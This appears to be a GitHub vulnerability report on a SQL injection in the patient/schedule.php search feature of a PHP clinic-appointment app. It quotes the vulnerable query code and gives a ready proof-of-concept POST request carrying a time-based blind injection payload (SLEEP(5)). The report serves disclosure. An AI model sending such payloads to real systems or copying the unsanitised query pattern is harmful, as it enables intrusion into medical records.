You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
patient/schedule.php from line 117,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 133 $result= $database->query($sqlmain) causes sql injection
......
......
......
if($_POST){
//print_r($_POST);if(!empty($_POST["search"])){
$keyword=$_POST["search"];
$sqlmain= "select * from schedule inner join doctor on schedule.docid=doctor.docid where schedule.scheduledate>='$today' and (doctor.docname='$keyword' or doctor.docname like '$keyword%' or doctor.docname like '%$keyword' or doctor.docname like '%$keyword%' or schedule.title='$keyword' or schedule.title like '$keyword%' or schedule.title like '%$keyword' or schedule.title like '%$keyword%' or schedule.scheduledate like '$keyword%' or schedule.scheduledate like '%$keyword' or schedule.scheduledate like '%$keyword%' or schedule.scheduledate='$keyword' ) order by schedule.scheduledate asc";
//echo$sqlmain;
$insertkey=$keyword;
$searchtype="Search Result : ";
$q='"';
}
}
$result= $database->query($sqlmain)
......
......
......
POC
POST /patient/schedule.php HTTP/1.1Host: www.edoc.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 8Origin: http://www.edoc.netConnection: closeReferer: http://www.edoc.net/patient/schedule.phpCookie: PHPSESSID=4ciqg01m5iftqio69u3m5sha12Upgrade-Insecure-Requests: 1search=1' AND SLEEP(5) AND 'tklr'='tklr
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
patient/schedule.php
from line 117,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 133$result= $database->query($sqlmain)
causes sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: